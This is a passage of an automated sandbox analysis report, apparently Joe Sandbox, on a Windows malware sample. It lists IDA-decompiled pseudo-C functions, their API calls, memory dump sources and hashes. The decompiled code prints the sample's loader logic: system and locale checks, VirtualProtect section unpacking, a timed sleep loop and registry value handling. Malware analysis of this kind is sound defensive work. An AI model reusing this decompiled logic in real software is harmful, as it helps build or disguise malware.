            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
            • String ID:
            • API String ID: 3214092121-3916222277
            • Opcode ID: 9d6f7317d6e7b1c2013a11e0f6c5231f6f0c4273bb81ad3ca4d6d81618d98d01
            • Instruction ID: e0717ba2bee134c914f9437c230776c3826013af792a1fafc5eafe718f15cc11
            • Opcode Fuzzy Hash: 9d6f7317d6e7b1c2013a11e0f6c5231f6f0c4273bb81ad3ca4d6d81618d98d01
            • Instruction Fuzzy Hash: C6519271A00218EBDF19CF9AC4846BDBBB6EF89354F14865AE9159F301C771AA41CB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			_entry_() {
            				void* _t1;
            				int _t4;
            				int _t6;
            
            				_t6 = 0;
            				_t1 = HeapCreate(0, 0x400000, 0); // executed
            				 *0x404160 = _t1;
            				if(_t1 != 0) {
            					 *0x404170 = GetModuleHandleA(0);
            					GetCommandLineW(); // executed
            					_t4 = E004019F1(); // executed
            					_t6 = _t4;
            					HeapDestroy( *0x404160);
            				}
            				ExitProcess(_t6);
            			}


            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
            • GetCommandLineW.KERNEL32 ref: 00401E06
              • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL ref: 00401A26
              • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
              • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
              • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
              • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
              • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • HeapDestroy.KERNEL32 ref: 00401E19
            • ExitProcess.KERNEL32 ref: 00401E20
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
            • String ID:
            • API String ID: 1863574965-0
            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E5251(void* __edx) {
            				void* _v8;
            				int _v12;
            				WCHAR* _v16;
            				void* __edi;
            				void* __esi;
            				void* _t23;
            				intOrPtr _t24;
            				void* _t26;
            				intOrPtr _t32;
            				intOrPtr _t35;
            				void* _t37;
            				intOrPtr _t38;
            				intOrPtr _t42;
            				void* _t45;
            				void* _t50;
            				void* _t52;
            
            				_t50 = __edx;
            				_v12 = 0;
            				_t23 = E047E6ADC(0,  &_v8); // executed
            				if(_t23 != 0) {
            					_v8 = 0;
            				}
            				_t24 =  *0x47ea348; // 0xc3d5a8
            				_t4 = _t24 + 0x47ebc70; // 0x5429218
            				_t5 = _t24 + 0x47ebb60; // 0x4f0053
            				_t26 = E047E33F1( &_v16, _v8, _t5, _t4); // executed
            				_t45 = _t26;
            				if(_t45 == 0) {
            					StrToIntExW(_v16, 0,  &_v12);
            					_t45 = 8;
            					if(_v12 < _t45) {
            						_t45 = 1;
            						__eflags = 1;
            					} else {
            						_t32 =  *0x47ea348; // 0xc3d5a8
            						_t11 = _t32 + 0x47ebcc8; // 0x5429270
            						_t48 = _t11;
            						_t12 = _t32 + 0x47ebb60; // 0x4f0053
            						_t52 = E047E5DE4(_t11, _t12, _t11);
            						_t59 = _t52;
            						if(_t52 != 0) {
            							_t35 =  *0x47ea348; // 0xc3d5a8
            							_t13 = _t35 + 0x47ebcf0; // 0x30314549
            							_t37 = E047E5157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
            							if(_t37 == 0) {
            								_t61 =  *0x47ea2fc - 6;
            								if( *0x47ea2fc <= 6) {
            									_t42 =  *0x47ea348; // 0xc3d5a8
            									_t15 = _t42 + 0x47ebcd2; // 0x52384549
            									E047E5157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
            								}
            							}
            							_t38 =  *0x47ea348; // 0xc3d5a8
            							_t17 = _t38 + 0x47ebbb8; // 0x5429160
            							_t18 = _t38 + 0x47ebc1c; // 0x680043
            							_t45 = E047E5B0E(_v8, 0x80000001, _t52, _t18, _t17);
            							HeapFree( *0x47ea2d8, 0, _t52);
            						}
            					}
            					HeapFree( *0x47ea2d8, 0, _v16);
            				}
            				_t54 = _v8;
            				if(_v8 != 0) {
            					E047E7220(_t54);
            				}
            				return _t45;
            			}

            APIs
            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05429218,00000000,?,746AF710,00000000,746AF730), ref: 047E52A0
            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05429160,?,00000000,30314549,00000014,004F0053,05429270), ref: 047E533D
            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047E68B6), ref: 047E534F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: d9ddf9fc3ba58ee7f60fd0b778e31a542c26b4f1e3fc0347da9899796fe9a04d
            • Instruction ID: 0abd724fa61973c6f1eaa5f6bd5039c6d7fd1f4da2e17d3a1848baf1387bde48
            • Opcode Fuzzy Hash: d9ddf9fc3ba58ee7f60fd0b778e31a542c26b4f1e3fc0347da9899796fe9a04d
            • Instruction Fuzzy Hash: BC318C3290020DFFDB11DBD7DD88EEA3BBCEB4C708F444265A501AB221DA75AE48DB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(80000002), ref: 047E43B5
            • SysAllocString.OLEAUT32(047E4D42), ref: 047E43F9
            • SysFreeString.OLEAUT32(00000000), ref: 047E440D
            • SysFreeString.OLEAUT32(00000000), ref: 047E441B
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 834127b9cd27aef42f022232012f7463f3153c082bb72b717154e3da6cc67047
            • Instruction ID: fd6fa0ca2264e12e1be2eac51ea98179a33784d3bbd1d02743bd6fec88de49e5
            • Opcode Fuzzy Hash: 834127b9cd27aef42f022232012f7463f3153c082bb72b717154e3da6cc67047
            • Instruction Fuzzy Hash: EE310EB6A00209AFCB05DF99D8849EE7BB5FF4D304B10852AF5069B250D734AA41CBA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 65%
            			E047E213E(void* __ecx, intOrPtr _a4) {
            				struct _FILETIME _v12;
            				int _t13;
            				signed int _t16;
            				void* _t17;
            				signed int _t18;
            				unsigned int _t22;
            				void* _t30;
            				signed int _t34;
            
            				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
            				asm("stosd");
            				do {
            					_t13 = SwitchToThread();
            					GetSystemTimeAsFileTime( &_v12);
            					_t22 = _v12.dwHighDateTime;
            					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
            					_push(0);
            					_push(0x13);
            					_push(_t22 >> 5);
            					_push(_t16);
            					L047E8436();
            					_t34 = _t16 + _t13;
            					_t17 = E047E6269(_a4, _t34);
            					_t30 = _t17;
            					_t18 = 3;
            					Sleep(_t18 << (_t34 & 0x00000007)); // executed
            				} while (_t30 == 1);
            				return _t30;
            			}

            APIs
            • SwitchToThread.KERNEL32(?,00000001,?,?,?,047E5044,?,?), ref: 047E214F
            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,047E5044,?,?), ref: 047E215B
            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 047E2174
              • Part of subcall function 047E6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 047E6308
            • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,047E5044,?,?), ref: 047E2193
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
            • String ID:
            • API String ID: 1610602887-0
            • Opcode ID: 68e6c456af700746fc3f44ea5066eeb64d1cca8ac4035abda2fa8782fe482edf
            • Instruction ID: 2f0e7e401855688c482a3f4bc8a8097983f425965d8e1cdd9413793603a85a19
            • Opcode Fuzzy Hash: 68e6c456af700746fc3f44ea5066eeb64d1cca8ac4035abda2fa8782fe482edf
            • Instruction Fuzzy Hash: 49F0A4B7B402047BD7149AA5CC1DBEF77BDDB88361F510624E601E7340E5B8AA018690
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E5157(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
            				struct _FILETIME _v12;
            				void* _t11;
            				short _t19;
            				void* _t21;
            				void* _t22;
            				void* _t24;
            				void* _t25;
            				short* _t26;
            
            				_t24 = __edx;
            				_t25 = E047E6536(_t11, _a12);
            				if(_t25 == 0) {
            					_t22 = 8;
            				} else {
            					_t26 = _t25 + _a16 * 2;
            					 *_t26 = 0;
            					_t22 = E047E330E(__ecx, _a4, _a8, _t25);
            					if(_t22 == 0) {
            						GetSystemTimeAsFileTime( &_v12);
            						_t19 = 0x5f;
            						 *_t26 = _t19;
            						_t21 = E047E7767(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
            						_t22 = _t21;
            					}
            					HeapFree( *0x47ea2d8, 0, _t25);
            				}
            				return _t22;
            			}

            APIs
              • Part of subcall function 047E6536: lstrlen.KERNEL32(?,00000000,05429E00,00000000,047E6F0A,0542A023,43175AC3,?,?,?,?,43175AC3,00000005,047EA00C,4D283A53,?), ref: 047E653D
              • Part of subcall function 047E6536: mbstowcs.NTDLL ref: 047E6566
              • Part of subcall function 047E6536: memset.NTDLL ref: 047E6578
            • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,05429270), ref: 047E518F
            • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,05429270), ref: 047E51BD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
            • String ID: Uet
            • API String ID: 1500278894-2766386878
            • Opcode ID: 9ab8b67d634ed911c1a332a216aaa4feed70b1e122a6fd3d77c34e3722bbcb15
            • Instruction ID: d8022a2efec36dad9e9a49b343291ad9f1a186b46458d2852de406f7fb5c52fe
            • Opcode Fuzzy Hash: 9ab8b67d634ed911c1a332a216aaa4feed70b1e122a6fd3d77c34e3722bbcb15
            • Instruction Fuzzy Hash: C3018472200209BBDB215F96DC44EEA3F79EF88718F404626FA009A251EA72E954D750
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E004014CF(void* __eax, void* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				long _v20;
            				int _t42;
            				long _t53;
            				intOrPtr _t56;
            				void* _t57;
            				signed int _t59;
            
            				_v12 = _v12 & 0x00000000;
            				_t56 =  *0x404180;
            				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
            				_v16 =  *(__eax + 6) & 0x0000ffff;
            				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
            				_v8 = _v8 & 0x00000000;
            				if(_v16 <= 0) {
            					L12:
            					return _v12;
            				} else {
            					goto L1;
            				}
            				while(1) {
            					L1:
            					_t59 = _v12;
            					if(_t59 != 0) {
            						goto L12;
            					}
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						asm("bt [esi+0x24], eax");
            						if(__eflags >= 0) {
            							L8:
            							_t53 = _t56 - 0x43175abf;
            							L9:
            							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
            							if(_t42 == 0) {
            								_v12 = GetLastError();
            							}
            							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
            							_v8 = _v8 + 1;
            							if(_v8 < _v16) {
            								continue;
            							} else {
            								goto L12;
            							}
            						}
            						asm("bt [esi+0x24], eax");
            						_t53 = _t56 - 0x43175ac1;
            						if(__eflags >= 0) {
            							goto L9;
            						}
            						goto L8;
            					}
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						_t53 = _t56 - 0x43175aa3;
            					} else {
            						_t53 = _t56 - 0x43175a83;
            					}
            					goto L9;
            				}
            				goto L12;
            			}

            APIs
            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
            • GetLastError.KERNEL32 ref: 00401583
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ProtectVirtual$ErrorLast
            • String ID:
            • API String ID: 1469625949-0
            • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
            • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E047E12C6(char* _a4, char** _a8) {
            				char* _t7;
            				char* _t11;
            				char* _t14;
            				char* _t16;
            				char* _t17;
            				char _t18;
            				signed int _t20;
            				signed int _t22;
            
            				_t16 = _a4;
            				_push(0x20);
            				_t20 = 1;
            				_push(_t16);
            				while(1) {
            					_t7 = StrChrA();
            					if(_t7 == 0) {
            						break;
            					}
            					_t20 = _t20 + 1;
            					_push(0x20);
            					_push( &(_t7[1]));
            				}
            				_t11 = E047E33DC(_t20 << 2);
            				_a4 = _t11;
            				if(_t11 != 0) {
            					StrTrimA(_t16, 0x47e9278); // executed
            					_t22 = 0;
            					do {
            						_t14 = StrChrA(_t16, 0x20);
            						if(_t14 != 0) {
            							 *_t14 = 0;
            							do {
            								_t14 =  &(_t14[1]);
            								_t18 =  *_t14;
            							} while (_t18 == 0x20 || _t18 == 9);
            						}
            						_t17 = _a4;
            						 *(_t17 + _t22 * 4) = _t16;
            						_t22 = _t22 + 1;
            						_t16 = _t14;
            					} while (_t14 != 0);
            					 *_a8 = _t17;
            				}
            				return 0;
            			}

            APIs
            • StrChrA.SHLWAPI(?,00000020,00000000,054295FC,?,?,047E53AF,?,054295FC), ref: 047E12E2
            • StrTrimA.KERNELBASE(?,047E9278,00000002,?,047E53AF,?,054295FC), ref: 047E1300
            • StrChrA.SHLWAPI(?,00000020,?,047E53AF,?,054295FC), ref: 047E130B
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Trim
            • String ID:
            • API String ID: 3043112668-0
            • Opcode ID: 6a0793ee2812c1c2b85f3f0efaa6c9025c4916969e58486c0d7a750bb1a082bc
            • Instruction ID: 145e1d3c7e8d5e50dd57069c19f46823ab21e7fcd617c2af1e696c12df2e89ab
            • Opcode Fuzzy Hash: 6a0793ee2812c1c2b85f3f0efaa6c9025c4916969e58486c0d7a750bb1a082bc
            • Instruction Fuzzy Hash: 8701B1713003466FE7104E6BCC4AFB77B9CEB8D340F844211A995CB382D670E841C660
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E61DA(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x47ea2d8, 0, _a4); // executed
            				return _t2;
            			}

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: febcc0e3e7c6f760b694d6ee42c09d3e97d5e5f21bc8773ac0d43006a47c0b7d
            • Instruction ID: 61f2a1c1a679aac7940f9cf50ca50bb640fecd5a2092f4f8f7594771aa9fc942
            • Opcode Fuzzy Hash: febcc0e3e7c6f760b694d6ee42c09d3e97d5e5f21bc8773ac0d43006a47c0b7d
            • Instruction Fuzzy Hash: A2B012F3200200EBCB114B03DF04F457B21E7D8700F00C610B3041807182360C20FB15
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LocalAlloc.KERNELBASE(00000000,02B53FFC,0079A862,0040108C,?,00401014), ref: 00414876
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: AllocLocal
            • String ID: t0@
            • API String ID: 3494564517-86208253
            • Opcode ID: a474110c101397cd18f60078a18c3dda39cdddade77e172d0c617e01277d085e
            • Instruction ID: be45306d5ca630943fb9e872924dde3a3a026e17281dafdd0bc2a0dc2c1a05f6
            • Opcode Fuzzy Hash: a474110c101397cd18f60078a18c3dda39cdddade77e172d0c617e01277d085e
            • Instruction Fuzzy Hash: 19A1A9717C4340BBF360ABA0DD47F9A77A4AB84B56F100426F7487E6D0C6B469848B6E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E047E790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
            				void* _v8;
            				void* __esi;
            				intOrPtr* _t35;
            				void* _t40;
            				intOrPtr* _t41;
            				intOrPtr* _t43;
            				intOrPtr* _t45;
            				intOrPtr* _t50;
            				intOrPtr* _t52;
            				void* _t54;
            				intOrPtr* _t55;
            				intOrPtr* _t57;
            				intOrPtr* _t61;
            				intOrPtr* _t65;
            				intOrPtr _t68;
            				void* _t72;
            				void* _t75;
            				void* _t76;
            
            				_t55 = _a4;
            				_t35 =  *((intOrPtr*)(_t55 + 4));
            				_a4 = 0;
            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
            				if(_t76 < 0) {
            					L18:
            					return _t76;
            				}
            				_t40 = E047E4358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
            				_t76 = _t40;
            				if(_t76 >= 0) {
            					_t61 = _a28;
            					if(_t61 != 0 &&  *_t61 != 0) {
            						_t52 = _v8;
            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
            					}
            					if(_t76 >= 0) {
            						_t43 =  *_t55;
            						_t68 =  *0x47ea348; // 0xc3d5a8
            						_t20 = _t68 + 0x47eb270; // 0x740053
            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
            						if(_t76 >= 0) {
            							_t76 = E047E4984(_a4);
            							if(_t76 >= 0) {
            								_t65 = _a28;
            								if(_t65 != 0 &&  *_t65 == 0) {
            									_t50 = _a4;
            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
            								}
            							}
            						}
            						_t45 = _a4;
            						if(_t45 != 0) {
            							 *((intOrPtr*)( *_t45 + 8))(_t45);
            						}
            						_t57 = __imp__#6;
            						if(_a20 != 0) {
            							 *_t57(_a20);
            						}
            						if(_a12 != 0) {
            							 *_t57(_a12);
            						}
            					}
            				}
            				_t41 = _v8;
            				 *((intOrPtr*)( *_t41 + 8))(_t41);
            				goto L18;
            			}

            APIs
              • Part of subcall function 047E4358: SysAllocString.OLEAUT32(80000002), ref: 047E43B5
              • Part of subcall function 047E4358: SysFreeString.OLEAUT32(00000000), ref: 047E441B
            • SysFreeString.OLEAUT32(?), ref: 047E79EA
            • SysFreeString.OLEAUT32(047E4D42), ref: 047E79F4
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: String$Free$Alloc
            • String ID:
            • API String ID: 986138563-0
            • Opcode ID: 7bbfe4d37e87d4b901522a6d554104c75856c8b2426a9f78d78d7749d282afb2
            • Instruction ID: 7964a95ab0625b0cd45657d4ccac1132515a328f105919b6fee602536744511b
            • Opcode Fuzzy Hash: 7bbfe4d37e87d4b901522a6d554104c75856c8b2426a9f78d78d7749d282afb2
            • Instruction Fuzzy Hash: F4313972500159AFCF15DF5AC888CABBB7AFFCD7407144658F9059B214D731AD91CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040139F() {
            				char _v16;
            				intOrPtr _v28;
            				void _v32;
            				void* _v36;
            				intOrPtr _t15;
            				void* _t16;
            				void* _t24;
            				long _t25;
            				int _t26;
            				void* _t30;
            				intOrPtr* _t32;
            				signed int _t35;
            				intOrPtr _t38;
            
            				_t15 =  *0x404184;
            				if( *0x40416c > 5) {
            					_t16 = _t15 + 0x40513c;
            				} else {
            					_t16 = _t15 + 0x40529c;
            				}
            				E00401D3C(_t16, _t16);
            				_t35 = 6;
            				memset( &_v32, 0, _t35 << 2);
            				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
            				if(_t24 == 0) {
            					_t25 = 0xb;
            				} else {
            					_t26 = lstrlenW( *0x404178);
            					_t8 = _t26 + 2; // 0x2
            					_t11 = _t26 + _t8 + 8; // 0xa
            					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
            					if(_t30 == 0) {
            						_t32 = _v36;
            						 *_t32 = 0;
            						if( *0x404178 == 0) {
            							 *((short*)(_t32 + 4)) = 0;
            						} else {
            							L00401FE6(_t32 + 4);
            						}
            					}
            					_t25 = E004012FB(_v28); // executed
            				}
            				ExitThread(_t25);
            			}

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ExitThreadlstrlen
            • String ID:
            • API String ID: 2636182767-0
            • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
            • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 047E32AB
              • Part of subcall function 047E790B: SysFreeString.OLEAUT32(?), ref: 047E79EA
            • SafeArrayDestroy.OLEAUT32(?), ref: 047E32FB
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
